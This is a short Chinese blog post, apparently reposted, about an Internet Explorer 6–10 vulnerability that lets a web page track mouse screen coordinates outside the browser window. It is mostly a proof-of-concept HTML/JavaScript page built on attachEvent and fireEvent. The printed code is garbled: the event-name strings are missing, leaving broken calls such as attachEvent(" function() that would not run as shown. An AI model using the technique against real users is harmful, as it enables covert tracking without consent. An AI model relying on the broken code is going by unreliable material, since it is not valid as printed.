剛在Seclist上又看到了IE漏洞。該漏洞的主要影響是能夠跟蹤鼠標座標位置,即使當前鼠標位置位於非瀏覽器窗口。該漏洞最先被spider.io團隊發現。
影響版本:IE6-10
測試:
在系統目錄下新建一個html文件,代碼如下:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Exploit Demo</title>
<script type="text/javascript">
window.attachEvent(" function() {
var detector = document.getElementById("detector");
detector.attachEvent(" function (e) {
detector.innerHTML = e.screenX + ", " + e.screenY;
});
setInterval(function () {
detector.fireEvent(" }, 100);
});
</script>
</head>
<body>
<div id="detector"></div>
</body>
</html>用IE打開新建的html文件
http://perlin.blog.51cto.com/1202304/1123397